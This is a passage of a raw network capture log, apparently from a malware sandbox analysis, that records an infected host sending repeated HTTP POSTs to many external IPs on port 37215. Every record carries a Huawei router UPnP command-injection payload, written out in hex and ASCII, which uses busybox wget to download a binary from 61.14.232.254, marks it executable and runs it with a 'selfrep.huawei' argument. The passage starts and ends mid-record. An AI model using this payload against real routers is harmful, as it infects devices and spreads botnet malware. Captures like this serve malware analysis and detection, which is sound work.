3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1907192.168.2.135751841.204.188.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.655263901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1908192.168.2.1355432157.84.210.21137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.655289888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1909192.168.2.1342078167.154.50.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.655658960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1910192.168.2.1343922197.99.75.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.655662060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1911192.168.2.133504641.175.198.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.655677080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1912192.168.2.1350182197.183.3.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.656073093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1913192.168.2.135947860.3.135.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.656156063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1914192.168.2.134327696.190.62.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.656162024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1915192.168.2.1347122157.24.156.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.656655073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1916192.168.2.1345980204.63.45.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.657092094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1917192.168.2.1351590157.51.160.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.657654047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
